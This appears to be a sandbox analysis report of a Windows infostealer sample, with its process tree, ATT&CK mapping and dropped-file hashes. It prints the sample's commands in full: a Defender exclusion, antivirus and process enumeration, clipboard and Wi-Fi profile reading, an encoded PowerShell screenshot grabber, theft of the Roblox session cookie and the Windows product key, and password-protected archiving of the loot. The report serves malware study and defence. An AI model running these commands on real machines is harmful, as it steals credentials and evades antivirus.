C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:4304

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
4⤵
- Suspicious use of WriteProcessMemory
PID:4856

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
5⤵
PID:2676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
4⤵
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
5⤵
PID:2744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
- Suspicious use of WriteProcessMemory
PID:4380

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎   .scr'"
4⤵
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎   .scr'
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:3864

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:4776

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
PID:4324

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
PID:2132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:4640

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:2916

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:2612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:1552

C:\Windows\system32\netsh.exe
netsh wlan show profile
5⤵
PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:3648

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3316

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
4⤵
PID:1372

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
5⤵
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
4⤵
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:872

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\htpqfh3r\htpqfh3r.cmdline"
6⤵
PID:2976

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5B6E.tmp" "c:\Users\Admin\AppData\Local\Temp\htpqfh3r\CSC4F27A0F6C5846A5B4A79362C0C558A5.TMP"
7⤵
PID:3064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:1608

C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:3324

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:3856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:4476

C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5032

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:2008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:884

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:800

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4856

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:4004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:1072

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5052

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:5016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:2260

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:2436

C:\Windows\system32\getmac.exe
getmac
5⤵
PID:2316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36522\rar.exe a -r -hp"milion40" "C:\Users\Admin\AppData\Local\Temp\OBxdu.zip" *"
4⤵
PID:3760

C:\Users\Admin\AppData\Local\Temp\_MEI36522\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI36522\rar.exe a -r -hp"milion40" "C:\Users\Admin\AppData\Local\Temp\OBxdu.zip" *
5⤵
- Executes dropped EXE
PID:1268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
4⤵
PID:3864

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
5⤵
PID:4256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
4⤵
PID:5044

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
5⤵
PID:556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:2396

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:2404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
4⤵
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:1404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
4⤵
PID:4276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2916

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8b7446aa8567042f84353e3ab351460c

SHA1
6fa18b3898d2a12d0073725eb8d3ad86a7ab039c

SHA256
ca2cc97f0167f8eca3d5519dd877436d3cb956a6028cc05e0b3bc09400091306

SHA512
408ebbc6c1cfb6fe5f87d4a59fdbae3c6168370f3391b1abada6914039ba87f373177e8788c73eb3841a0c0d9c6f2414d36418f8e382253dab44f298622b7019

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
92e3c3ced354c8cc6824a96f932b5a98

SHA1
f5b03b5759e71bb513d54cb8553e5ef5d66cc4e1

SHA256
af8e68a69a85d0b5cdac24975e3c99b00aac8d3ef92272aa57eb6b202f2634a0

SHA512
2c3cc5c739cb529664ec027d1de33ac534745cfafcfe8f39fce9586c00aa977d82ecde91cb3d96665929f9e8912e5094e7e3db59f1807616aaa4542c06905933

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a28115a0b99e1628f4b22fe751626704

SHA1
f6c1a3bb1c46eea1d8ac31551e3b91b2004fc57e

SHA256
8fe0f9cb43d348eeb8de56f9ccca2ca5b787978f2e41b861bb04a5b134839f60

SHA512
7ee7051a3dbe621096dcf7c3b2c0ccd6c5ca30729bf3322597b74e8299c742a5653c73b9a7013a2565dc7a0da3de0af4a6fb4c38417748469983bf1117b16ee1

Download Submit
C:\Users\Admin\AppData\Local\Temp\41BC.tmp\41BD.tmp\41BE.bat
Filesize
7KB

MD5
924adee75529bce582ea2c9f503828a6

SHA1
ba8ebd2b7d15d838e1eb6f8d32e4c386f747ced9

SHA256
c65f92e2891313070846aa3144f60898c77be960c2a5fffd2ff4a65b70f08f0c

SHA512
589158041fb7032c30aae85347c929a5cf1bfb04f4b2342a709a2de03d3c604f3a3a3a64b2af6c9b1e28f7b9e4bdda40b221fe652fae2aefef79c8c3f9a64508

Download Submit
C:\Users\Admin\AppData\Local\Temp\Atyanjlltndx.exe
Filesize
6.9MB

MD5
2d07c38a7fe96e2e3beec83fd510b0b6

SHA1
8b4c5b3dece5154e3f30aa44223d9cdc693a39e4

SHA256
d50a64d36d6f98c3dbdea314d420dbc016344087d6a0cd8201197d83f2fc4377

SHA512
9cca2a02706ba9486b27dc594b59a47c5df427624969f1537f0f35b1212c32ff3cd629811abb4a425485573e5d93792c712d839c33ae775787be2386001b99a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kbwdawuun.exe
Filesize
129KB

MD5
66efe67d3c8f924223583a8130cc86bd

SHA1
eff211f2398cc53c26a3dc4b4d1c32f7fd918d73

SHA256
64d458cc5792715d89204c0be9d1c4bece43a56d159393a99a21d09f32f14df0

SHA512
1359b6601fffc2428e05eda4d94ac9bb8c1ef4e7d1b0e45f4345708489dc54fc13a60a42d86e3e662b61845046e5260d4a3e94f749b7c0012ace5bc65629545b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5B6E.tmp
Filesize
